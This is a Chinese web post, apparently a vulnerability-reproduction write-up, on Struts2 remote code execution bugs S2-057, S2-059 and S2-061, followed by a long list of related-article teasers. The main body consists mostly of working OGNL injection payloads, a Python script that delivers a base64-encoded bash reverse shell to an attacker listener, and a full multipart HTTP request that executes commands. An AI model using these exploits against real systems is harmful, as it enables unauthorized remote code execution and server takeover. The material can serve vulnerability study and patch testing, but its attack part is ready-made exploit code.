Struts2遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)編碼

0x00 Struts2 簡介

Struts2 是 Apache 軟件組織推出的一個相當(dāng)強大的 Java Web 開源框架，本質(zhì)上相當(dāng)于一個 servlet。Struts2 基于 MVC 架構(gòu)，框架結(jié)構(gòu)清晰。通常作為控制器（Controller）來建立模型與視圖的數(shù)據(jù)交互，用于創(chuàng)建企業(yè)級 Java web 應(yīng)用程序。該框架多版本存在遠(yuǎn)程代碼執(zhí)行，

0x01 Struts2 (CVE-2018-11776)

Struts2 S2-057

payload：/struts2-showcase/$%7B233*233%7D/actionChain1.action

驗證漏洞存在：

paylaod：ls：查看目錄下文件，paylaod需要進(jìn)行url編碼
${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

0x02 Struts2 (CVE-2019-0230)

Struts2 S2-059

漏洞驗證paylaod：/?id=%25{2*5}

反彈shell：paylaod：使用python3環(huán)境，運行前查看環(huán)境執(zhí)行是否正常

反彈paylaod：bash -i >& /dev/tcp/192.168.222.134/6666 0>&1
需要base64加密放入下paylaod
import requests
url = "http://192.168.222.134:8080"
data1 = {
    "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"
}
data2 = {
    "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyMi4xMzQvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}'))}"
}
res1 = requests.post(url, data=data1)
res2 = requests.post(url, data=data2)
print(123)

?執(zhí)行腳本

shell接收成功：

0x03 Struts2 (CVE-2020-17530)

Struts2 S2-061

POC：post請求：
POST / HTTP/1.1
Host: 192.168.222.134:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=node016yd6hhrzkka19x0sws5e7i9g1.node0
If-None-Match: W/"187-1504645830000"
If-Modified-Since: Tue, 05 Sep 2017 2130 GMT
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Connection: close
Content-Length: 829


------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"


%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("id")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--

0x04 strust2 命令執(zhí)行檢測工具

github：https://github.com/HatBoy/Struts2-Scan
現(xiàn)支持部分序號的st2檢測：s2-053之前，測試過程還是出現(xiàn)了很多問題，實戰(zhàn)中建議使用單獨的對應(yīng)exp檢測

編輯：黃飛

閱讀全文

控制器(170265) 控制器(170265)
JAVA(102855) JAVA(102855)

project復(fù)現(xiàn)過程踩到坑對應(yīng)的解決方案

最近做的一個 project 需要復(fù)現(xiàn) EMNLP 2020 Findings 的 TinyBERT，本文是對復(fù)現(xiàn)過程對踩到坑，以及對應(yīng)的解決方案和實現(xiàn)加速的一個記錄。

2022-08-19 11:09:05

1467

小米路由器任意文件讀取及遠(yuǎn)程命令執(zhí)行漏洞解析

存在任意文件讀取漏洞和遠(yuǎn)程命令執(zhí)行漏洞，攻擊者通過該漏洞可以獲取服務(wù)器權(quán)限，導(dǎo)致服務(wù)器失陷。二、漏洞復(fù)現(xiàn) 系統(tǒng)首頁地址及頁面顯示如下 ? ?http://xx.xx.xx.xx/cgi-bin

2023-03-01 15:09:17

1582

2018先知白帽大會 | 議題解讀

一個。議題解讀2017年又是反序列漏洞的大年，涌現(xiàn)了許多經(jīng)典的因為反序列化導(dǎo)致的遠(yuǎn)程代碼執(zhí)行漏洞，像fastjson，jackson，struts2，weblogic這些使用量非常大的產(chǎn)品都存在

2018-06-14 16:50:40

Struts框架技術(shù)在J2EE中的研究和應(yīng)用

Struts框架技術(shù)在J2EE中的研究和應(yīng)用J2EE簡介J2EE是一個開放的、基于標(biāo)準(zhǔn)的平臺，可以開發(fā)、部署和管理N層結(jié)構(gòu)的、面向Web的、以服務(wù)器為中心的企業(yè)級應(yīng)用，它是利用Java 2 平臺來

2009-11-13 22:07:17

遠(yuǎn)程執(zhí)行后臺程序問題

大佬們，我linux ssh遠(yuǎn)程后臺執(zhí)行一個jar 退出終端程序就掉了，使用的命令是nohup java路徑 -jar jar程序 &退出終端后仍然程序掛掉。使用nohup java路徑

2020-11-11 15:59:59

DM368 MP3編碼及程序遠(yuǎn)程升級問題

MP3編碼器好?? ??????? 還有一個問題:請問專家,appro 的 SDK有沒有遠(yuǎn)程升級內(nèi)核/文件系統(tǒng)的功能? ?????? 謝謝 [td][td][/tr][tr]

2018-05-31 04:55:55

M031如何執(zhí)行USB設(shè)備遠(yuǎn)程喚醒功能

應(yīng)用程序: 演示如何執(zhí)行 USB 設(shè)備遠(yuǎn)程喚醒功能。 BSP 版本: M031系列 BSP CMSIS V3.01.000 硬件: NuMaker-M032SE V1.3 此示例代碼包含 USB

2023-08-30 08:51:17

[下載]Struts2+Hibernate3整合項目視頻下載（不定期更新）

關(guān)系。 整體視頻大綱： 視頻是完全真實課堂錄制，視頻主要內(nèi)容包括：1：Struts2和Hibernate3在實際項目開發(fā)中的使用2：自定義泛型、反射、注解、枚舉等技術(shù)在

2010-04-26 10:13:20

[下載]Struts2+Hibernate3整合項目視頻（新版的增刪改查）

Struts2+Hibernate3整合項目視頻（新版的增刪改查） 1、應(yīng)用通用的DAO 2、真實值/表現(xiàn)值的轉(zhuǎn)換  在

2010-03-17 14:53:41

[轉(zhuǎn)帖]學(xué)JAVA需要掌握的技術(shù)及流程

分頁、Web樹、Javascript在Web開發(fā)中的應(yīng)用、常見的一些Web控件等等。 14.Struts2框架  完整的學(xué)習(xí)Struts2框架

2010-05-14 13:19:24

codewarrior代碼不執(zhí)行

mc9s08dz60芯片，使用codewarrior編寫代碼時，使用了TMP1和TMP2兩個定時器，如果使TMP1一直執(zhí)行，TMP2中有部分代碼不執(zhí)行。如果不初始化TMP1，TMP2中所有代碼可以正常執(zhí)行。

2015-07-17 16:59:26

fastjson為什么會被頻繁爆出漏洞？

這件事兒，并且給出了升級建議。但是作為一個開發(fā)者，我更關(guān)注的是他為什么會頻繁被爆漏洞？于是我?guī)е苫?，去看了下fastjson的releaseNote以及部分源代碼。最終發(fā)現(xiàn)，這其實和fastjson中

2020-11-04 06:01:21

使用 Python 執(zhí)行 js 代碼

}Python執(zhí)行混淆js代碼import execjsctx = execjs.compile("""function add(bi1,Pl$2){return bi1+Pl$2

2022-03-31 16:05:47

北大青鳥的struts課件下載

北大青鳥的struts課件下載北大青鳥的structs課件內(nèi)容有掌握Struts的控制器組件掌握Struts的視圖標(biāo)簽運用Struts的Validator框架理解Struts的MVC原理理解JSF

2008-12-08 11:13:54

固件漏洞安全問題的解決辦法

的安全性?！　?jù)Gartner數(shù)據(jù)，截止2022年，約有70%未執(zhí)行固件升級計劃的組織將由于固件漏洞而遭到入侵。而今年疫情的出現(xiàn)也導(dǎo)致了全球供應(yīng)鏈不斷增加的中短期風(fēng)險?！　　　」碳?b class="flag-6" style="color: red">漏洞正逐年增加

2020-09-07 17:16:48

國產(chǎn)智能掃地機器人被曝存在安全漏洞，易隱私泄露

　　導(dǎo)讀：安全研究人員發(fā)現(xiàn)智能機器人存在兩個安全漏洞，導(dǎo)致其容易受到攻擊。第一個漏洞可以讓黑客對設(shè)備擁有超級用戶權(quán)限，可以遠(yuǎn)程控制它們在家里運動，這有點令人毛骨悚然。第二個漏洞允許黑客查看攝像機拍攝

2018-07-27 09:29:19

基于樹莓派2 blacktrack的系統(tǒng)漏洞掃描

本帖最后由 weizhizhou 于 2017-4-30 00:06 編輯基于樹莓派2 blacktrack的系統(tǒng)漏洞掃描對Linux系統(tǒng)開發(fā)有5年了，近期在blackberry2上移植把玩

2017-04-29 09:59:05

如何執(zhí)行USB設(shè)備遠(yuǎn)程喚醒功能

應(yīng)用程序: 演示如何執(zhí)行 USB 設(shè)備遠(yuǎn)程喚醒功能。 BSP 版本: M031系列 BSP CMSIS V3.01.000 硬件: NuMaker-M032SE V1.3 此示例代碼包含 USB

2023-08-23 07:13:40

如何遠(yuǎn)程更新代碼？

大家好，我有一段時間在和一些核板一起工作?，F(xiàn)在我打算建立我的第一個個人董事會。我的最終目標(biāo)是能夠遠(yuǎn)程更新我板上的代碼?？赡軉?？我已經(jīng)閱讀了一些遠(yuǎn)程更新固件的文章，這是我必須遵循的方式嗎？

2022-12-30 08:56:40

如何去解決問題碼流復(fù)現(xiàn)seek失敗的問題呢

tplayerdemo播放任意在線mp3 http/https流，剛開始播放約幾秒后，執(zhí)行命令 seek to: 100 ，會從0開始播放。注意：出現(xiàn)以上問題的碼流為包含ID3V2.3標(biāo)簽的mp3流

2021-12-29 06:04:16

嵌入式代碼可能存在的致命漏洞是什么

關(guān)注+星標(biāo)公眾號，不錯過精彩內(nèi)容來源 |電子伊甸園微信公眾號|嵌入式專欄隨著互聯(lián)網(wǎng)的發(fā)展，嵌入式設(shè)備正分布在一個充滿可以被攻擊者利用的源代碼級安全漏洞的環(huán)境中。因此，嵌入式軟件開發(fā)...

2021-12-17 07:59:40

開源鴻蒙 OpenHarmony 獲得 CVE 通用漏洞披露編號頒發(fā)資質(zhì)

披露計劃）建立，由來自世界各地的 IT 供應(yīng)商、安全公司和安全研究組織組成。相關(guān)者可以通過唯一的 CVE編碼在漏洞數(shù)據(jù)庫或安全工具中快速地找到漏洞影響范圍和修補信息，以便快速地確認(rèn)系統(tǒng)受漏洞影響情況

2022-08-17 11:34:03

影響 Linux 系統(tǒng)安全基石的 glibc 嚴(yán)重漏洞

編者按：這個消息是幾個月前曝出的，也許我們該對基礎(chǔ)軟件的安全問題更加重視。谷歌披露的一個嚴(yán)重漏洞影響到了主流的 Linux 發(fā)行版。glibc 的漏洞可能導(dǎo)致遠(yuǎn)程代碼執(zhí)行。幾個月前，Linux 用戶

2016-06-25 10:01:50

某安全瀏覽器竟然也被查出高危漏洞？開源安全問題不容忽視

發(fā)現(xiàn)的漏洞都會被第一時間公布，因此也容易被攻擊者利用2.開源組件的作者通常都會在發(fā)現(xiàn)問題后立刻修復(fù)并發(fā)布新版本，而軟件的最終用戶往往得不到最及時的更新。3.在軟件開發(fā)和驗收過程中，人們往往無法準(zhǔn)確判斷

2017-09-05 14:26:59

歡迎共同討論matlab 漏洞

應(yīng)該是-1.71。用MATLAB求解的結(jié)果為復(fù)數(shù) 0.8550 + 1.4809i，這顯然不對。漏洞2、用plot()命令畫反余切函數(shù)圖象：例如我們繪制acot(x),正確的圖象應(yīng)該是但我們用

2012-04-29 12:01:10

源代碼審計怎么做？有哪些常用工具

地匹配、查找。 2、Checkmax：通過虛擬編譯器自動對軟件源代碼分析，并建立了代碼元素及代碼元素之間關(guān)系的邏輯圖。然后對這個內(nèi)部代碼圖進(jìn)行查詢，包含已知安全漏洞和質(zhì)量缺陷問題預(yù)先設(shè)定好的查詢列表

2024-01-17 09:35:47

用于緩解高速緩存推測漏洞的固件接口

CVE-2017-5715，也稱為Spectre Variant 2，是某些ARM CPU設(shè)計中的漏洞，允許攻擊者控制受害者執(zhí)行上下文中的推測執(zhí)行流，并泄露攻擊者在體系結(jié)構(gòu)上無法訪問的數(shù)據(jù)。在

2023-08-25 07:36:27

硬件芯片漏洞的機理和危害

硬件芯片漏洞的機理和危害：只為傳遞“有趣/有用”的開發(fā)者內(nèi)容，點擊訂閱！本周熱門項目GitHub推出軟件包托管服務(wù)Package Registry本周，GitHub 再下一城，推出自己的軟件包托管

2021-07-28 07:26:42

請問遠(yuǎn)程執(zhí)行IC驗證是怎么實現(xiàn)的？

請問遠(yuǎn)程執(zhí)行IC驗證是怎么實現(xiàn)的？

2021-06-17 10:27:33

請問如何在STMIDE中執(zhí)行編碼標(biāo)準(zhǔn)？

有沒有辦法通過一些文本突出顯示在 STMIDE 中強制執(zhí)行編碼標(biāo)準(zhǔn)？即：“函數(shù)名稱應(yīng)為 Function_Name()”等。在這種情況下，STM 對其生成的庫使用什么規(guī)則？有人為此推薦一些插件嗎？其他人在編寫代碼時試圖遵循哪些標(biāo)準(zhǔn)？

2023-01-12 06:53:25

深入淺出Struts 2 (中文PDF版)

深入淺出Struts 2Struts2 是Struts的下一代產(chǎn)品。而最初提案Struts Ti所設(shè)想的發(fā)展方向，在Struts的現(xiàn)有代碼的基礎(chǔ)上是很難完成的。在發(fā)起提案的時候，Patrick Lightbody把多個不同的Web框

2008-10-29 14:17:37

Struts快速學(xué)習(xí)指南-pdf

Struts快速學(xué)習(xí)指南:Struts 是一個技術(shù)框架，由Craig R. McClanahan編寫，并且在2000 年的時候捐獻(xiàn)給了ASF，目前，有很多組織和個人參與Struts 框架的開發(fā)，使得Struts保持高速成長，同時

2008-12-08 10:32:50

北大青鳥struts課件下載

北大青鳥struts課件:理解JSF的體系結(jié)構(gòu),掌握J(rèn)SF應(yīng)用程序的開發(fā)步驟,掌握J(rèn)SF應(yīng)用的導(dǎo)航規(guī)則,熟練掌握J(rèn)SF應(yīng)用的標(biāo)簽庫,掌握Struts的控制器組件,掌握Struts的視圖標(biāo)簽,運用Struts的Validator

2008-12-08 10:59:04

Struts技術(shù)簡介

Struts 框架是最重要的組件，它通過使用Servlet org.apache.struts.action.ActionServlet 來實現(xiàn)struts-config.xml的配置信息，把請求轉(zhuǎn)發(fā)給適當(dāng)?shù)腁ction對象不存在，ActionServlet會先創(chuàng)建這個對象Actio

2008-12-08 11:01:10

Struts控制器組件

Web 應(yīng)用程序是許多單獨組件的集合Struts 實現(xiàn)了模型-視圖-控制器Struts框架實現(xiàn)的只是MVC的視圖和控制器組件Struts 的備選框架JSF、Springstruts-config.xml 文件告訴 ActionServlet

2008-12-08 11:02:15

Struts視圖組件

Struts視圖組件控制器是應(yīng)用程序中的訪問中心點ActionServlet 從 Struts 配置文件中讀取數(shù)據(jù)并初始化 Struts 應(yīng)用程序的配置RequestProcessor 類處理請求的所有特性，所有請求都是在

2008-12-08 11:03:07

基于Struts框架和Procedure的Web開發(fā)模式

介紹基于MVC設(shè)計模式的Struts框架的組成和實現(xiàn)原理，總結(jié)該開發(fā)框架的應(yīng)用特點和開發(fā)步驟。在分析和比較其他基于Struts開發(fā)模式特點的基礎(chǔ)上，提出基于Struts和存儲過程結(jié)合的Web

2009-04-23 10:16:20

漢明糾錯編碼器實例（VHDL源代碼）

漢明糾錯嗎編碼器實例（VHDL源代碼）:

2009-05-27 10:11:15

基于Struts2企業(yè)級異常處理研究及擴展

傳統(tǒng)的Java異常-捕獲機制已不能滿足當(dāng)今大型企業(yè)級開發(fā)的要求。本文對Struts2提供的異常處理機制進(jìn)行了研究和擴展，提出將檢查型（Checked）異常轉(zhuǎn)化為非檢查型（Unchecked）異常

2009-06-18 08:19:24

基于Struts框架構(gòu)建績效考核管理系統(tǒng)

績效考核管理系統(tǒng)是企業(yè)對員工績效進(jìn)行量化考核的手段。首先分析了構(gòu)建系統(tǒng)的目的，然后對基于MVC設(shè)計模式的struts框架進(jìn)行了介紹，通過舉例具體闡明了在采用struts框架進(jìn)行開

2009-08-12 10:00:41

基于Struts和Hibernate的Web應(yīng)用的構(gòu)建

本文介紹了 MVC 模式與兩個開源框架：Struts 和Hibernate，提出了基于這兩種框架的Web 應(yīng)用的模型，并就Struts 和Hibernate 在模型中的工作流程給出了較為詳細(xì)的闡述，最后對模型的

2009-08-29 10:30:03

Struts及其在糧食倉儲系統(tǒng)中的應(yīng)用

文中介紹了一種利用Struts 結(jié)構(gòu)化應(yīng)用程序的方法，并結(jié)合項目中的實際應(yīng)用，談了些作者的心得體會。關(guān)鍵詞：J2EE；MVC；Struts；JSP；Servlet

2009-09-09 08:10:09

基于Struts和Hibernate框架的Web應(yīng)用的設(shè)計與

基于J2EE 平臺的框架技術(shù)是目前開發(fā)Web 應(yīng)用的主流技術(shù)。其中，Struts 框架基于MVC 設(shè)計模式，清晰地劃分了控制部分、業(yè)務(wù)邏輯和視圖，實現(xiàn)了各層之間的解耦；而Hibernate 對JDBC 提供

2009-09-14 16:21:31

EZW編碼器源代碼

2010-02-09 15:21:03

Struts編程源代碼

Struts編程源代碼部分代碼如下: %@ taglib uri="/WEB-INF/struts-bean.tld" prefix="bean" %><%@ taglib uri="/WEB-INF/struts-logic.tld" prefix="logic" %>&l

2010-03-31 14:32:08

Struts2 極速表單驗證框架使用說明書

1 Struts2 極速表單驗證框架使用說明書.12 Struts 2 極速表單驗證框架簡介.23 項目許可.34 下載本項目.35 演示應(yīng)用.46 整合步驟step by step 87 驗證規(guī)則表達(dá)式詳解.128 和R

2010-09-18 08:27:05

struts實現(xiàn)多圖片上傳

package　com.ninetowns.zhangc.struts.action;public　class　Constant　{ 　 private　Constant

2010-12-27 17:28:44

基于Struts框架的科技管理系統(tǒng)的設(shè)計

在總結(jié)傳統(tǒng)B/S架構(gòu)的科技管理系統(tǒng)存在的許多弊端的基礎(chǔ)上，探討Struts框架的體系結(jié)構(gòu)及實現(xiàn)MVC設(shè)計模式的機制，詳細(xì)分析科技管理系統(tǒng)的主要功能，并利用Struts框架和Java語言對該

2010-12-29 17:30:29

#硬聲創(chuàng)作季 Spring視頻教程從入門到精通：09SSH整合-版本1-搭建struts2的開發(fā)環(huán)境并測試

springStruts系統(tǒng)架構(gòu)

Mr_haohao發(fā)布于 2022-10-03 13:48:33

#硬聲創(chuàng)作季 Spring視頻教程從入門到精通：13SSH整合-版本1-拷貝struts2整合spring的

springStruts系統(tǒng)架構(gòu)

Mr_haohao發(fā)布于 2022-10-03 13:51:45

Struts中文手冊下載

經(jīng)過了兩個星期不懈努力，今天終于完成了對strtus整體架構(gòu)及核心標(biāo)簽庫的介紹。從幾乎不懂struts和HTML標(biāo)簽，到可以給別人解決涉及struts的一些小問題，這與朋友的幫助和我的努力是分不開的，但我更希望它能給那些想要學(xué)的，正在學(xué)的和已經(jīng)學(xué)過的人帶來不同

2011-02-28 14:39:51

Struts In Action使用領(lǐng)先的Java框架構(gòu)建Web應(yīng)用

歡迎你閱讀《Struts In Action》。本書的目的是幫助Web應(yīng)用開發(fā)者能夠最好的使用Struts web應(yīng)用框架。 Struts是一個開源軟件，有助于開發(fā)者更加快速和容易地建立 Web 應(yīng)用程序。Struts依靠絕

2011-04-14 20:17:50

Struts2和Ibatis在畢業(yè)答辯管理系統(tǒng)中的應(yīng)用

在深入分析Struts2和Ibatis基礎(chǔ)上,構(gòu)建了兩框架的整合方案。文中以畢業(yè)答辯管理系統(tǒng)設(shè)計與實現(xiàn)為例,介紹其在實際開發(fā)過程中的應(yīng)用。

2011-10-17 16:41:47

Struts2 V3.0入門

Struts 2是Struts的下一代產(chǎn)品，是在 struts 和WebWork的技術(shù)基礎(chǔ)上進(jìn)行了合并的全新的Struts 2框架。其全新的Struts 2的體系結(jié)構(gòu)與Struts 1的體系結(jié)構(gòu)的差別巨大。Struts 2以WebWork為核心，采用攔

2011-12-06 10:46:29

J2EE基于Struts和Hibernate框架的新聞發(fā)布系統(tǒng)分析

以J2EE為基礎(chǔ)，對Struts和Hibernate框架分別進(jìn)行深入剖析，研究分析二者的整合集成技術(shù)，并對開發(fā)所使用的MVC設(shè)計模式和MySQL數(shù)據(jù)庫簡要介紹。通過引入新聞系統(tǒng)實例討論了Struts框架對系

2012-08-29 14:51:35

Struts2源代碼分析

Struts2源代碼分析。

2015-11-06 10:06:50

漏洞挖掘-可執(zhí)行代碼檢測(2)#計算機

計算機

學(xué)習(xí)硬聲知識發(fā)布于 2023-07-16 10:56:16

取漢字編碼源代碼

易語言是一門以中文作為程序代碼編程語言學(xué)習(xí)例程：易語言-取漢字編碼

2016-06-06 17:03:03

遠(yuǎn)程控制_源代碼

易語言是一門以中文作為程序代碼編程語言學(xué)習(xí)例程：遠(yuǎn)程控制

2016-06-06 17:43:55

h264編碼解碼源代碼

h264編碼解碼源代碼h264編碼解碼源代碼

2017-01-14 15:50:23

結(jié)合靜態(tài)分析與動態(tài)符號執(zhí)行的軟件漏洞檢測方法

動態(tài)符號執(zhí)行是近年來新興的一種軟件漏洞檢測方法，它可以為目標(biāo)程序的不同執(zhí)行路徑自動生成測試用例，從而獲得較高的測試代碼覆蓋率。然而，程序的執(zhí)行路徑很多，且大部分路徑都是漏洞無關(guān)的，通常那些包含危險

2017-11-23 15:01:36

蘋果最新 MacOS 安全更新包中含有針對 USB 代碼執(zhí)行漏洞的補丁

蘋果公司最新的 MacOS 安全更新包中包含了針對 USB 代碼執(zhí)行漏洞的補丁。這個漏洞存在于 fsck_msods 工具之中。fsck_msods是一個系統(tǒng)工具，它可以用來檢測并修復(fù) FAT

2017-11-27 06:34:37

316

基于符號執(zhí)行技術(shù)實現(xiàn)的驅(qū)動程序的漏洞檢測

研究表明，驅(qū)動程序的漏洞是造成Linux系統(tǒng)安全問題的主要原因之一，可引發(fā)提權(quán)、拒絕服務(wù)等高危情況。針對無具體設(shè)備的情況下，無法對驅(qū)動程序進(jìn)行運行時漏洞檢測的問題，提出了對驅(qū)動程序進(jìn)行符號化執(zhí)行

2017-12-05 16:06:01

精準(zhǔn)執(zhí)行可達(dá)性分析

可達(dá)性分析在定向測試、靜態(tài)分析結(jié)果核驗、錯誤復(fù)現(xiàn)和漏洞POC構(gòu)造等領(lǐng)域均有廣泛應(yīng)用．本文對近年來國內(nèi)外學(xué)者在該研究領(lǐng)域取得的相關(guān)研究成果進(jìn)行了系統(tǒng)的分析、提煉和總結(jié)．首先，指出了精準(zhǔn)執(zhí)行可達(dá)性分析對應(yīng)的約束求

2017-12-19 15:42:16

AMD回應(yīng)Spectre漏洞更新：將提供微代碼更新盡快修復(fù)舊平臺變磚問題

Spectre漏洞是近段時間大家比較關(guān)注的問題，據(jù)悉，AMD就舊平臺變磚問題問題將會在本周提供Spectre漏洞的微代碼更新。AMD表示已經(jīng)分發(fā)給左右主板廠商。

2018-01-12 15:25:07

797

360發(fā)現(xiàn)區(qū)塊鏈平臺EOS的一系列高危安全漏洞，安全問題不容忽視

360安全衛(wèi)士于2018年5月29日下午在微博上發(fā)布公告稱，360Vulcan（伏爾甘）團(tuán)隊發(fā)現(xiàn)了區(qū)塊鏈平臺EOS的一系列高危安全漏洞。經(jīng)驗證，其中部分漏洞可以在EOS節(jié)點上遠(yuǎn)程執(zhí)行任意代碼，即可以通過遠(yuǎn)程攻擊，直接控制和接管EOS上運行的所有節(jié)點。

2018-07-03 10:50:00

1143

基于棧式自編碼的惡意代碼分類算法

針對傳統(tǒng)機器學(xué)習(xí)方法不能有效地提取惡意代碼的潛在特征，提出了基于棧式自編碼（ stacked auto en-coder，SAE）的惡意代碼分類算法。其次從大量訓(xùn)練樣本中學(xué)習(xí)并提取惡意代碼紋理圖像

2018-01-16 17:19:38

微軟Windows Defender出現(xiàn)漏洞攻擊者可利用漏洞對計算機進(jìn)行控制

最近安全人員發(fā)現(xiàn)了一個Windows Defender漏洞，這個漏洞是一個遠(yuǎn)程代碼執(zhí)行漏洞，通過追溯微軟自己使用的開源歸檔工具發(fā)現(xiàn)的。攻擊者可以利用這個漏洞在計算機上執(zhí)行遠(yuǎn)程代碼操作，甚至可以自己執(zhí)行下載文件的操作。

2018-06-07 01:27:00

1044

羅克韋爾 Allen-Bradley MicroLogix 1400 可編程邏輯控制器中存在多個嚴(yán)重的漏洞

，CVSS評分為8.6。這是一個基于堆棧的緩沖區(qū)溢出漏洞，可以通過特制的 Modbus TCP 數(shù)據(jù)包發(fā)送到受影響的設(shè)備進(jìn)行觸發(fā)，允許攻擊者遠(yuǎn)程執(zhí)行任意代碼。但羅克韋爾自動化早在2017年12月份發(fā)布了針對B系列和C系列硬件的固件版本21.003，以修復(fù)該漏洞。

2018-04-08 15:39:39

10765

360發(fā)現(xiàn)區(qū)塊鏈EOS安全漏洞其足以轟癱數(shù)字體系

近日，360公司Vulcan（伏爾甘）團(tuán)隊發(fā)現(xiàn)了區(qū)塊鏈平臺EOS的一系列高危安全漏洞。經(jīng)驗證，其中部分漏洞可以在EOS節(jié)點上遠(yuǎn)程執(zhí)行任意代碼，即可以通過遠(yuǎn)程攻擊，直接控制和接管EOS上運行的所有節(jié)點。

2018-06-07 07:35:00

640

瑞士工業(yè)技術(shù)公司ABB的門禁通信系統(tǒng)中存在多個嚴(yán)重漏洞

研究人員發(fā)現(xiàn)的其中一個漏洞為遠(yuǎn)程代碼注入漏洞，允許訪問本地網(wǎng)絡(luò)的攻擊者控制目標(biāo)設(shè)備。該漏洞影響本地配置 Web 服務(wù)器，攻擊者可向系統(tǒng)發(fā)送特制的信息利用該漏洞。

2018-06-14 11:55:57

5026

Oracle發(fā)布季度補丁更新修復(fù)遠(yuǎn)程代碼執(zhí)行漏洞

2018年7月18日，美國甲骨文（Oracle）公司官方發(fā)布了季度補丁更新，其中修復(fù)了一個 Oracle WebLogic Server 遠(yuǎn)程代碼執(zhí)行漏洞 CVE-2018-2893，此漏洞是對編號為 CVE-2018-2628 修復(fù)的繞過，攻擊者同樣可以在未身份驗證的情況下對 WebLogic 進(jìn)行攻擊。

2018-07-27 15:45:07

2877

博思艾倫獲10億美元合同，成美國政府最大網(wǎng)絡(luò)安全提供商

2018年8月22日，Struts2 官方公布最新的 Struts2 遠(yuǎn)程代碼執(zhí)行漏洞 S2-057，CVE-2018-11776，當(dāng)在 struts2 開發(fā)框架中使用泛 namespace 功能的時候，并且使用特定的 result 可能產(chǎn)生遠(yuǎn)程代碼執(zhí)行漏洞。存在高危風(fēng)險。

2018-08-24 14:34:12

5219

遠(yuǎn)程代碼執(zhí)行漏洞現(xiàn)身運行內(nèi)嵌式系統(tǒng)的流行操作系統(tǒng)

在主要用于智能家居及關(guān)鍵基礎(chǔ)設(shè)施系統(tǒng)中的大部分微處理器與單片機的開源操作系統(tǒng)FreeRTOS中，已發(fā)現(xiàn)13個漏洞，其中三分之一可用來執(zhí)行遠(yuǎn)程代碼。

2018-10-28 09:30:45

3283

Adobe發(fā)布安全更新，修復(fù)了Adobe Acrobat與Reader中多個關(guān)鍵安全漏洞

據(jù)悉，在這87個漏洞中，共有39個高危漏洞，這將允許攻擊者在受感染計算機上執(zhí)行代碼或提升權(quán)限。代碼執(zhí)行漏洞可允許攻擊者在受感染計算機上執(zhí)行命令，而特權(quán)提升漏洞可允許攻擊者以更高的權(quán)限等級執(zhí)行命令

2018-12-14 14:25:32

2613

ThinkPHP5.0.遠(yuǎn)程代碼執(zhí)行漏洞預(yù)警

Thinkphp5.0.*存在遠(yuǎn)程代碼執(zhí)行漏洞。攻擊者可以利用漏洞實現(xiàn)任意代碼執(zhí)行等高危操作。

2019-01-26 16:26:00

2976

RCE漏洞具有17年歷史，影響了數(shù)個Linux系統(tǒng)

一個影響點對點協(xié)議守護(hù)程序（Point-to-Point Protocol daemon，pppd）軟件，并具有 17 年歷史的遠(yuǎn)程代碼執(zhí)行（remote code execution，RCE）漏洞已對幾個基于 Linux 的操作系統(tǒng)造成了影響。

2020-03-10 14:32:23

1642

施耐德定級硬編碼漏洞為“嚴(yán)重”，已發(fā)布修復(fù)建議

近日，施耐德電氣最新發(fā)布的安全公告中，公開致謝頂象洞見安全實驗室發(fā)現(xiàn)并協(xié)助成功修復(fù)硬編碼漏洞（CVE-2020-7498）。公告中施耐德電氣將該漏洞定級為“嚴(yán)重”，攻擊者利用該漏洞，可對PLC設(shè)備進(jìn)行重啟、植入惡意軟件，甚至損壞設(shè)備。

2020-06-16 10:01:09

3410

黑客利用遠(yuǎn)程代碼執(zhí)行漏洞，超過30萬個網(wǎng)站易受到攻擊

黑客正積極利用一個關(guān)鍵的遠(yuǎn)程代碼執(zhí)行漏洞，允許未經(jīng)驗證的攻擊者在運行易受攻擊的File Manager插件版本的WordPress站點上載腳本并執(zhí)行任意代碼。

2020-09-03 16:20:47

1639

關(guān)于嵌入式代碼的致命漏洞

